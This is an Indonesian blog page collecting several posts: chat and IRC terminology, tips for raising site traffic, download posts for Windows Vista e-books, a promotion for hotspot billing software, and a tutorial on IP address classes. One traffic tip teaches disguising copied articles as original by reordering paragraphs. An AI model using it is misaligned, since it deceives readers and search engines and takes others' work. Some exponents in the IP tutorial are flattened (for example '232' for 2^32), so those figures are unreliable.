WB = Welcome back
WB = Write back
WC = Who cares
WDMB = Will do my best
WE = Whatever
WNDITWB = We never did it this way before
WRT = With regard to
WTG = Way to go!
WWJD = What would Jesus do?
XOXOXO = Hugs and kisses
Y = Why?
YMMV = Your mileage may vary
YRG = You are good!
YVW = You're very welcome
YW = You're welcome

Istilah Dalam Chating Yahoo dan MIRC
Net splits
Server Network terpecah (disebut "net split"), jadi memisahkan anda dari user-user yang sedang berbicara dengan anda. Split ini sering terjadi cukup singkat, walau kadang sampai beberapa hari.

Lag
Masalah yang sering muncul adalah "lag", dimana ada delay yang terasa antara waktu ketika anda mengetikkan pesan dan sampai orang lain membacanya. Pilihlah server terdekat dengan kita untuk mengurangi lag. Lag dapat diukur dengan menggunakan perintah /ping (lihat bagian perintah-perintah di atas). Perintah untuk berpindah server adalah /server nama.server.tsb.

Server List
Biasanya dengan mengetik /links memberikan list dari server-server pada net yang bersangkutan. Gunakan perintah ini secara sparing, tidak lebih dari beberapa kali dalam satu baris.

Ping? Pong!
Ping? Pong! berarti server dalam status mem"ping" anda untuk memastikan bahwa anda masih terkoneksi, dan client anda otomatis membalas dengan pong. Tidak usah khawatir dengan hal ini.

Peringatan tentang DCC chat
Dengan menggunakan perintah /dcc chat anda dapat mengirim file atau untuk digunakan membuka koneksi one-to-one yang menghindarkan dari lagi dan tidak akan diputuskan oleh net split. Periksalah dokumentasi client anda untuk petunjuk penggunaan. Pada client-client yang umum, anda dapat menset koneksi DCC chat dengan sekaligus mengetikkan /dcc chat nick_dari_orang_lain. Untuk berbicara melalui koneksi itu, ketik /msg =nick apa saja (perhatikan tanda =). Dalam mIRC, anda dapat juga memulai sesi DCC chat dengan memilih DCC dan kemudian Chat dari menu dan kemudian memasukkan nick dari user yang ingin kita ajak berbicara. Sebuah window akan terbuka untuk sesi dcc chat tersebut.

Read More for Istilah Dalam Chating Yahoo dan MIRC

Cara Menaikkan Traffic

Terasa bedanya loh, begitu web kita di update dengan konten yang asli, langsung deh hasil tulisan kita bertengger di Top 10 mesin pencarian google....
Update content sesering mungkin itu intinya, tapi ingat content yang kita buat harus asli bukan hasil copy , sebab google lebih menyukai web yang mempunyai content asli walaupun isinya baru beberapa biji dibanding web yang punya content ribuan tapi isinya hasil copy ...(terbukti di blog gw)


Tip: posting content hasil copy biar dianggap original (efektif)
Misal kita mau copy artikel yang mempunyai 5 Paragrap.

Teks Asli
judul
- paragrap 1
- paragrap 2
- paragrap 3
- paragrap 4
- paragrap 5

Menjadi...
Judul rubah dikit
- Paragrap 3
- paragrap 1
- paragrap 4
- paragrap 2
- paragrap 5
tapi ingat setiap isi paragrap harus relevan, berhubungan satu sama lain.
Klo mau 100% mau copy serta kan sumbernya aja..

Read More for Cara Menaikkan Traffic

Windows VISTA Secrets

Windows VISTA Secrets
Mirror:
Format: PDF
Size: 18.91 MB
MD5: b5068b1956b6482a20f25e607f063c39
password: independentmaker


Code:
Download Windows VISTA Secrets
or
fresh high quality pdf.rar 18.7 MB
Code:
Download Windows VISTA Secrets

Read More for Windows VISTA Secrets

Windows Vista Tricks

Image
All over the world, Windows gurus have been working overtime to uncover the hottest new Windows Vista tips, tricks, and tweaks.Now, J. Peter Bruzzese has collected all their best discoveries in one place: Tricks of the Microsoft® Windows VistaTM Masters!


Bruzzese has interviewed top Windows professionals, instructors, and power users; scoured the Web (so you won’t have to); and rigorously tested every single tip. Only the most valuable tips tecnhiques and tips made the cut to improve your efficiency, take total control of your digital media and data; use Internet Explorer 7, Windows Mail, and Calendar; configure Windows Defender and Firewall; avoid, troubleshoot, and fix problems; make Windows Vista work better, faster, smarter, safer, and more fun too!

Introduction:
1 General Tips and Tricks of the Masters
2 Mastering the Control Panel
3 Mastering Administration
4 Security Enhancements
5 Disk Configuration and Volume Tricks
6 Office 2007 Tricks for Vista Masters
7 Master Vista Networking
8 System Recovery and Diagnostic Tricks
9 Mastering the New Vista Apps
10 Group Policy Power
Code:
Download Windows Vista Tricks
Windows Vista Tricks

Read More for Windows Vista Tricks

Billing Hotspot Gratis


Sebagai Permulaan jika anda menginginkan membangun atau memasang billing hotspot pada jaringan Wireless atau LAN, atau menginginkan user/client dalam mengakses internet diwajibkan melakukan authentikasi web login dengan memasukkan user name dan password yang telah di otorisasi sebelumnya, tidak ada penginstallan lagi disisi user/client seperti yang biasanya digunakan oleh warnet-warnet, tetapi system web login ini biasanya terdapat pada akses internet Hotel atau Cafe-cafe yang pemakainya menggunakan Voucher.


Mempunyai kelebihan lainnya adalah anti mac cloning atau anti wireless hacking bagi yang mencoba melakukan mac cloning sebab PC/User yang mendapat hak akses adalah PC/User yang pertama kali melakukan otorisasi pertama kali dengan memasukkan user name dan password, bagi yang coba-coba melakukan perintah ICMP/Ping akan selalu tertolak (request time out) walaupun sudah mendapatkan IP Address dari hotspot. Jika diterapkan pada system keamanan jaringan wireless sangat safety karena tidak perlu lagi menggunakan system keamanan enkripsi WEP/WPA atau Hide SSID yang dengan sangat mudah di jebol sang hacker karena system keamananya berada di layer LAN.
System ini mampu melakukan blokir IP address/Web site yang sangat menguras kapasitas bandwith internet seperti adanya aktifitas download di Rapidshare/Megaupload yang bisa menguras kapasitas bandwith anda, atau mengamankan anda atau anak-anak atau karyawan anda dari web-web yang mengandung content sex/porno.

Sitem ini sangat tepat digunakan di kantor yang akan mengatur pemakaian internet pada karyawan, misalnya berapa bandwith yang akan digunakan untuk satu bulan atau penggunaanya pada jam-jam tertentu saja, yang akan meningkat kenerja karyawan untuk menghindarkan penggunaan internet yang menggagu pekerjaan seperti kegiatan chatting atau mendownload file yang tidak berguna. System web login ini sangat banyak diterapkan pada akses internet pada Hotel, bandara atau cafe yang mana user datang membawa laptop yang dilengkapi wifi. System biiling ini bisa juga diterapkan bagi yang mau mendirikan ISP baik secara Wired atau Wireless.

System ini dijalankan di OS Windows XP yang disertai pengaturan bandwith manajemen dan bisa digunakan tanpa bantuan router, cukup hanya dengan hub/switch saja jadi dengan system ini nantinya anda tidak perlu lagi harus memiliki PC Router tambahan, cukup dengan sebuah PC yang dijadikan server yang dapat membuat anda menjalankan Hotspot anda dengan hemat.

Jika anda berminat maka kami adalah solusinya dengan biaya terjangkau dapat digunakan mengatur akses internet untuk ;
- Cyber Cafe
- Warnet
- Perpustakaan
- Sekolah
- Hotel

Feature :
- Instalasi system billing di atas Operation System Windows
- dijaringan LAN dan Wireless/Wifi
- Instalasi cukup diserver tanpa perlu instalasi software di sisi client
- User akan diarahkan langsung Redirect ke halaman Web-based login
sebelum mengakses internet
- Membuat prepaid user accounts dengan username and password
- Control Time
- Pembatasan Bandwidth (Traffic Quota Management)
- Pengaturan kuota Bandwidth (Traffic Shaping Management)
- Anti Mac Cloning dan Anti hacking atau Wireless Hacking. Sudah teruji....
- Support Prabayar atau Pasca Bayar
- Halaman Login bisa diedit Sesuai Logo dan keinginan Client
- Easy, powerful, reliable & user friendly
- URL Filtering
- Packet Filter
- Pengaturan Free open Web Site
- Timecodes dan personalized Member accounts.
- Dapat digunakan diatas Internet Explorer, Firefox, Opera, Safari, Konqueror dan lain-lain

Billing Hotspot Gratis type Cyber Cafe Dapat Anda Download Disini

Billing_Hotspot.rar

Read More for Billing Hotspot Gratis

IP Address di Internet

Para pengguna Internet umumnya kita hanya perlu mengenal hostname dari mesin yang dituju, seperti: ui.ac.id, itb.ac.id, server.indo.net.id, rad.net.id,. Bagi komputer untuk bekerja langsung menggunakan informasi tersebut akan relatif lebih sulit karena tidak ada keteraturan yang dapat di programkan dengan mudah. Untuk mengatasi hal tersebut, komputer mengidentifikasi alamat setiap komputer menggunakan sekumpulan angka sebanyak 32 bit yang dikenal sebagai IP address.

Dengan Adanya IP Address merupakan konsekuensi dari penerapan Internet Protocol untuk mengintegrasikan jaringan komputer Internet di dunia. Seluruh host (komputer) yang terhubung ke Internet dan ingin berkomunikasi memakai TCP/IP harus memiliki IP Address sebagai alat pengenal host pada network. Secara logika, Internet merupakan suatu network besar yang terdiri dari berbagai sub network yang terintegrasi. Oleh karena itu, suatu IP Address harus bersifat unik untuk seluruh dunia. Tidak boleh ada satu IP Address yang sama dipakai oleh dua host yang berbeda. Untuk itu, penggunaan IP Address di seluruh dunia dikoordinasi oleh lembaga sentral Internet yang di kenal dengan IANA - salah satunya adalah Network Information Center (NIC) yang menjadi koordinator utama di dunia untuk urusan alokasi IP Address ini adalah :



InterNIC Registration Services Network Solution Incorporated 505 Huntmar Park Drive, Herndon, Virginia 22070 Tel: [800] 444-4345, [703] 742-4777 FAX: [703] 742-4811 E-mail: hostmaster@internic.net

Sedang di Asia Pasifik saat ini masih dikoordinasi oleh:

Asia Pacific Network Information Center c/o Internet Initiative Japan, Inc. Sanbancho Annex Bldg., 1-4, Sanban-cho, Chiyoda-ku, Tokyo, 102 Japan Tel: +81-3-5276-3973 FAX: +81-3-5276-6239 E-mail: domreg@apnic.net http://www.apnic.net

Struktur IP Address
IP Address susunannya terdiri dari bilangan biner sepanjang 32 bit yang dibagi atas 4 segmen. Tiap segmen terdiri atas 8 bit yang berarti memiliki nilai desimal dari 0 - 255. Range address yang bisa digunakan adalah dari 00000000.00000000.00000000.00000000 sampai dengan 11111111.11111111.11111111.11111111. Jadi, ada sebanyak 232 kombinasi address yang bisa dipakai diseluruh dunia (walaupun pada kenyataannya ada sejumlah IP Address yang digunakan untuk keperluan khusus). Jadi, jaringan TCP/IP dengan 32 bit address ini mampu menampung sebanyak 232 atau lebih dari 4 milyar host. Untuk memudahkan pembacaan dan penulisan, IP Address biasanya direpresentasikan dalam bilangan desimal. Jadi, range address di atas dapat diubah menjadi address 0.0.0.0 sampai address 255.255.255.255. Nilai desimal dari IP Address inilah yang dikenal dalam pemakaian sehari-hari. Beberapa contoh IP Address adalah :

44.132.1.20
167.205.9.35
202.152.1.250

Gambaran IP Addres dalam desimal dan biner dapat dilihat pada gambar 1 berikut :

Gambar 1. IP Address dalam Bilangan Desimal dan Biner

IP Address dapat dibagi menjadi 2 bagian, yakni bagian network (bit-bit network/network bit) dan bagian host (bit-bit host/host bit). Bit network berperan dalam identifikasi suatu network dari network yang lain, sedangkan bit host berperan dalam identifikasi host dalam suatu network. Jadi, seluruh host yang tersambung dalam jaringan yang sama memiliki bit network yang sama. Sebagian dari bit-bit bagian awal dari IP Address merupakan network bit/network number, sedangkan sisanya untuk host. Garis pemisah antara bagian network dan host tidak tetap, bergantung kepada kelas network. Ada 3 kelas address yang utama dalam TCP/IP, yakni kelas A, kelas B dan kelas C. Perangkat lunak Internet Protocol menentukan pembagian jenis kelas ini dengan menguji beberapa bit pertama dari IP Address. Penentuan kelas ini dilakukan dengan cara berikut : ·

* Untuk itu jika bit pertama dari IP Address adalah 0, address merupakan network kelas A. Bit ini dan 7 bit berikutnya (8 bit pertama) merupakan bit network sedangkan 24 bit terakhir merupakan bit host. Dengan demikian hanya ada 128 network kelas A, yakni dari nomor 0.xxx.xxx.xxx sampai 127.xxx.xxx.xxx, tetapi setiap network dapat menampung lebih dari 16 juta (2563) host (xxx adalah variabel, nilainya dari 0 s/d 255). Ilustrasinya dapat dilihat pada gambar 2 berikut.


Gambar 2. Struktur IP Address Kelas A

*·Untuk itu jika 2 bit pertama dari IP Address adalah 10, address merupakan network kelas B. Dua bit ini dan 14 bit berikutnya (16 bit pertama) merupakan bit network sedangkan 16 bit terakhir merupakan bit host. Dengan demikian terdapat lebih dari 16 ribu network kelas B (64 x 256), yakni dari network 128.0.xxx.xxx - 191.255.xxx.xxx. Setiap network kelas B mampu menampung lebih dari 65 ribu host (2562). Ilustrasinya dapat dilihat pada gambar 3 berikut.


Gambar 3. Struktur IP Address Kelas B

* Jika 3 bit pertama dari IP Address adalah 110, address merupakan network kelas C. Tiga bit ini dan 21 bit berikutnya (24 bit pertama) merupakan bit network sedangkan 8 bit terakhir merupakan bit host. Dengan demikian terdapat lebih dari 2 juta network kelas C (32 x 256 x 256), yakni dari nomor 192.0.0.xxx sampai 223.255.255.xxx. Setiap network kelas C hanya mampu menampung sekitar 256 host. Ilustrasinya dapat dilihat pada gambar 4.


Gambar 4. Struktur IP Address Kelas C

Dari tiga kelas di atas, ada lagi 2 kelas lagi yang ditujukan untuk pemakaian khusus, yakni kelas D dan kelas E. Jika 4 bit pertama adalah 1110, IP Address merupakan kelas D yang digunakan untuk multicast address, yakni sejumlah komputer yang memakai bersama suatu aplikasi (bedakan dengan pengertian network address yang mengacu kepada sejumlah komputer yang memakai bersama suatu network). Salah satu penggunaan multicast address yang sedang berkembang saat ini di Internet adalah untuk aplikasi real-time video conference yang melibatkan lebih dari dua host (multipoint), menggunakan Multicast Backbone (MBone). Kelas terakhir adalah kelas E (4 bit pertama adalah 1111 atau sisa dari seluruh kelas). Pemakaiannya dicadangkan untuk kegiatan eksperimental.

Kelas address jenisnya diberikan oleh kooordinator IP Address bergantung kepada kebutuhan instansi yang meminta, yakni jumlah host yang akan diintegrasikan dalam network dan rencana pengembangan untuk beberapa tahun mendatang. Untuk perusahaan, kantor pemerintah atau universitas besar yang memiliki puluhan ribu komputer dan sangat berpotensi untuk tumbuh menjadi jutaan komputer, koordinator IP Address akan mempertimbangkan untuk memberikan kelas A. Contoh IP Address kelas A yang dipakai di Internet adalah untuk amatir paket radio seluruh dunia, mendapat IP nomor 44.xxx.xxx.xxx. Untuk kelas B, contohnya adalah nomor 167.205.xxx.xxx yang dialokasikan untuk ITB dan jaringan yang terkait ke ITB dibawah koordinator Onno W. Purbo.

IP Address Khusus
IP Address lain yang dipergunakan untuk pengenal host, ada beberapa jenis address yang digunakan untuk keperluan khusus dan tidak boleh digunakan untuk pengenal host. Address tersebut adalah :
* Network Address.
Network Address digunakan untuk mengenali suatu network pada jaringan Internet. Misalkan untuk host dengan IP Address kelas B 167.205.9.35. Tanpa memakai subnet, network address dari host ini adalah 167.205.0.0. Address ini didapat dengan membuat seluruh bit host pada 2 segmen terakhir menjadi 0. Tujuannya adalah untuk menyederhanakan informasi routing pada Internet. Router cukup melihat network address (167.205) untuk menentukan kemana paket tersebut harus dikirimkan. Contoh untuk kelas C, network address untuk IP address 202.152.1.250 adalah 202.152.1.0. Analogi yang baik untuk menjelaskan fungsi network address ini adalah dalam pengolahan surat pada kantor pos. Petugas penyortir surat pada kantor pos cukup melihat kota tujuan pada alamat surat (tidak perlu membaca seluruh alamat) untuk menentukan jalur mana yang harus ditempuh surat tersebut. Pekerjaan "routing" surat-surat menjadi lebih cepat. Demikian juga halnya dengan router di Internet pada saat melakukan routing atas paket-paket data.

* Broadcast Address.
Broadcast Address digunakan untuk mengirim/menerima informasi yang harus diketahui oleh seluruh host yang ada pada suatu network. Seperti diketahui, setiap paket IP memiliki header alamat tujuan berupa IP Address dari host yang akan dituju oleh paket tersebut. Dengan adanya alamat ini, maka hanya host tujuan saja yang memproses paket tersebut, sedangkan host lain akan mengabaikannya. Bagaimana jika suatu host ingin mengirim paket kepada seluruh host yang ada pada networknya ? Tidak efisien jika ia harus membuat replikasi paket sebanyak jumlah host tujuan. Pemakaian bandwidth akan meningkat dan beban kerja host pengirim bertambah, padahal isi paket-paket tersebut sama. Oleh karena itu, dibuat konsep broadcast address. Host cukup mengirim ke alamat broadcast, maka seluruh host yang ada pada network akan menerima paket tersebut. Konsekuensinya, seluruh host pada network yang sama harus memiliki address broadcast yang sama dan address tersebut tidak boleh digunakan sebagai IP Address untuk host tertentu. Jadi, sebenarnya setiap host memiliki 2 address untuk menerima paket : pertama adalah IP Addressnya yang bersifat unik dan kedua adalah broadcast address pada network tempat host tersebut berada. Address broadcast diperoleh dengan membuat seluruh bit host pada IP Address menjadi 1. Jadi, untuk host dengan IP address 167.205.9.35 atau 167.205.240.2, broadcast addressnya adalah 167.205.255.255 (2 segmen terakhir dari IP Address tersebut dibuat berharga 11111111.11111111, sehingga secara desimal terbaca 255.255). Jenis informasi yang dibroadcast biasanya adalah informasi routing.
* Netmask.
Merupakan address yang digunakan untuk melakukan masking / filter pada proses pembentukan routing supaya kita cukup memperhatikan beberapa bit saja dari total 32 bit IP Address. Artinya dengan menggunakan netmask tidak perlu kita memperhatikan seluruh (32 bit) IP address untuk menentukan routing, akan tetapi cukup beberapa buah saja dari IP address yg kita perlu perhatikan untuk menentukan kemana packet tersebut dikirim.

Hubungan antara host address, network address, broadcast address & network mask sangat erat sekali - semua dapat dihitung dengan mudah jika kita cukup paham mengenai bilangan Biner. Jika kita ingin secara serius mengoperasikan sebuah jaringan komputer menggunakan teknologi TCP/IP & Internet, adalah mutlak bagi kita untuk menguasai konsep IP address tersebut. Konsep IP address sangat penting artinya bagi routing jaringan Internet. Kemampuan untuk membagi jaringan dalam subnet IP address penting artinya untuk memperoleh routing yang sangat effisien & tidak membebani router-router yang ada di Internet. Mudah-mudahan tulisan awal ini dapat membuka sedikit tentang teknologi / konsep yang ada di dalam Internet.

Read More for IP Address di Internet
R